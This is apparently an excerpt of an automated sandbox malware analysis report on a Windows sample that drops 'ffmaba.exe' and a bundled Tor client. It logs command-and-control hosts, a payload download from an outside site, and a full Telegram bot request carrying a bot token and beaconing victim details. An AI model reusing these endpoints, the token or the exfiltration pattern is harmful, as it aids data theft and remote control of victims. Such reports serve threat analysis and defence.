                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D091C CRYPTO_zalloc,memcpy,CRYPTO_clear_free,25_2_6C1D091C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19A911 CONF_imodule_get_value,NCONF_get_section,OPENSSL_sk_num,OPENSSL_sk_value,strrchr,CRYPTO_malloc,memcpy,OBJ_create,CRYPTO_free,OPENSSL_sk_num,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C19A911
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0900 CRYPTO_zalloc,memcpy,CRYPTO_clear_free,CRYPTO_secure_zalloc,CRYPTO_secure_clear_free,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C1D0900
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C272960 ERR_load_strings_const,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,CRYPTO_THREAD_unlock,25_2_6C272960
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BA954 BUF_MEM_free,CRYPTO_free,CRYPTO_free,25_2_6C1BA954
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29A970 OPENSSL_thread_stop,CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,25_2_6C29A970
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A8940 CRYPTO_THREAD_lock_free,CRYPTO_THREAD_lock_new,ERR_put_error,25_2_6C1A8940
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E944 CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,ASN1_TYPE_free,25_2_6C18E944
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3049B0 CRYPTO_THREAD_get_local,GetLastError,TlsGetValue,SetLastError,25_2_6C3049B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B6990 CRYPTO_free,CRYPTO_free,25_2_6C1B6990
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DC990 Camellia_decrypt,25_2_6C1DC990
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304990 CRYPTO_THREAD_init_local,TlsAlloc,25_2_6C304990
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F89B0 DES_cfb_encrypt,DES_encrypt1,25_2_6C1F89B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19A9AB CRYPTO_malloc,memcpy,OBJ_create,CRYPTO_free,OPENSSL_sk_num,25_2_6C19A9AB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1989A4 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C1989A4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F29A0 CONF_modules_load_file,NCONF_new,NCONF_load,CONF_modules_load,NCONF_free,ERR_peek_last_error,ERR_clear_error,CONF_get1_default_config_file,CRYPTO_free,25_2_6C1F29A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3049F0 CRYPTO_THREAD_set_local,TlsSetValue,25_2_6C3049F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D09DC CRYPTO_secure_clear_free,25_2_6C1D09DC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A89D6 CRYPTO_THREAD_lock_new,ERR_put_error,25_2_6C1A89D6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C27A9F0 EVP_MD_CTX_copy_ex,ENGINE_init,EVP_MD_CTX_reset,EVP_MD_CTX_clear_flags,memcpy,EVP_PKEY_CTX_dup,ERR_put_error,EVP_MD_CTX_set_flags,ERR_put_error,CRYPTO_malloc,EVP_MD_CTX_reset,ERR_put_error,25_2_6C27A9F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AC9F0 CRYPTO_strdup,strlen,CRYPTO_malloc,strcpy,25_2_6C2AC9F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3409D0 BN_bn2hex,strlen,CRYPTO_malloc,OPENSSL_strlcpy,OPENSSL_strlcat,CRYPTO_free,OPENSSL_strlcpy,OPENSSL_strlcat,ERR_put_error,CRYPTO_free,25_2_6C3409D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2909C0 EVP_PKEY_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C2909C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2A29C0 CRYPTO_cfb128_8_encrypt,__stack_chk_fail,25_2_6C2A29C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F69F0 CRYPTO_zalloc,ERR_put_error,25_2_6C1F69F0
                Source: tor-real.exe, 00000019.00000002.4506289259.0000000004247000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_f5bcfea9-4
                Source: yt7dW9nyJK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: yt7dW9nyJK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h19_2_06290158
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096774BCh19_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096774BCh19_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h19_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h19_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 0967B584h19_2_0967B0E8
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov ecx, dword ptr [ebp-60h]19_2_09672230
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096786C1h19_2_096784C0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov ecx, dword ptr [ebp-60h]19_2_0967222E
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h19_2_0967AAE9
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096774BCh19_2_09676F56
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]25_2_6C190E40

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: securefirewall.portmap.io
                Found Tor onion address
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: To debug, this may helpWhat was %p doing in pending_entry_connections in %s?Closing one-hop stream to '%s/%s' because the OR conn just failed.entry_conn->socks_requestGiving up on enclave exit '%s' for destination %s.At %s:%d: %p was unexpectedly in circuit_wait. Closing.Application request to port %d: this port is commonly used for unencrypted protocols. Please make sure you don't send anything you would mind the rest of the Internet reading!%sREJECTWARNDANGEROUS_PORT PORT=%d RESULT=%sPort %d listed in RejectPlaintextPorts. Closing.exitoniononion Invalid %shostname %s; rejectingClient asked for %s:%d.exitThe ".exit" notation is disabled in Tor due to security risks.SOCKS_BAD_HOSTNAME HOSTNAME=%sUnable to automap address %sAutomapping %s to %sREVERSE[%s]Missing mapping for virtual address '%s'. Refusing.Onion address %s requested from a port with .onion disabledResolve requests to hidden services not allowed. Failing.Attachstream to a circuit is not supported for .onion addresses currently. Failing.Using previously configured client authorization for hidden service request.Got a hidden service request for ID '%s'addresstype == ONION_V3_HOSTNAMEfailed to parse hs addressNot fetching.Refetching.usableunusableFound %s descriptor in cache for %s. %s.Invalid service name '%s'No descriptor found in our cache for %s. Fetching.Unknown cache lookup error %dedge_conn->rend_dataedge_conn->hs_identDescriptor is here. Great.Stale automapped address for '%s.exit'. Refusing.Address '%s.exit', with impossible source for the .exit part. Refusing.!automapMalformed exit address '%s.exit'. Refusing.Unrecognized relay in exit address '%s.exit'. Refusing.Excluded relay in exit address '%s.exit'. Refusing.Destination '%s' seems to be an invalid hostname. Failing.Refusing to connect to non-hidden-service hostname or IP address %s because Port has OnionTrafficOnly set (or NoDNSRequest, NoIPv4Traffic, and NoIPv6Traffic).Refusing to connect to hostname %s because Port has NoDNSRequest set.Refusing to connect to IPv4 address %s because Port has NoIPv4Traffic set.Refusing to connect to IPv6 address %s because Port has NoIPv6Traffic set.Application asked to connect to port 0. Refusing.Rejecting request for anonymous connection to private address %s on a TransPort or NATDPort. Possible loop in your NAT rules?%sRejecting SOCKS request for anonymous connection to private address %s.%sRejecting SOCKS request for an IP address family that this listener does not support.Rejecting SOCKS4 request for an IPv6 address.Rejecting SOCKS4 request on a listener with no IPv4 traffic supported.Redirecting address %s to exit at enclave router %saddresstype == ONION_V2_HOSTNAME || addresstype == ONION_V3_HOSTNAMEWarning! You've just connected to a v2 onion address. These addresses are deprecated for security reasons, and are no longer supported in Tor. Please encourage the site operator to upgrade. For more information see https://blog.torproject.org/v2-deprecation-timelineCalled connection_a
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 193.161.193.99:31510
                Source: global trafficTCP traffic: 192.168.2.5:49725 -> 140.78.100.15:8443
                Source: global trafficTCP traffic: 192.168.2.5:49726 -> 185.119.118.59:8080
                Source: global trafficTCP traffic: 192.168.2.5:49729 -> 193.142.146.239:9001
                Source: global trafficTCP traffic: 192.168.2.5:49730 -> 95.217.36.40:9993
                Source: global trafficHTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
                Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: BITREE-ASRU BITREE-ASRU
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ip-api.com
                Source: unknownDNS query: name: ip-api.com
                Source: unknownTCP traffic detected without corresponding DNS query: 51.158.147.144
                Source: unknownTCP traffic detected without corresponding DNS query: 51.158.147.144
                Source: unknownTCP traffic detected without corresponding DNS query: 51.158.147.144
                Source: unknownTCP traffic detected without corresponding DNS query: 72.132.134.217
                Source: unknownTCP traffic detected without corresponding DNS query: 72.132.134.217
                Source: unknownTCP traffic detected without corresponding DNS query: 72.132.134.217
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 51.158.147.144
                Source: unknownTCP traffic detected without corresponding DNS query: 51.158.147.144
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: global trafficHTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: securefirewall.portmap.io
                Source: global trafficDNS traffic detected: DNS query: libyaalahrar.co
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.171.125.177:9000
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:2789/
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:2789/pData
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.88.44.159:80
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.141.24:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.141.8:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.142.3:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.142.6:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.143.23:8080
                Source: ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.143.25:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.144.19:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.146.28:8080
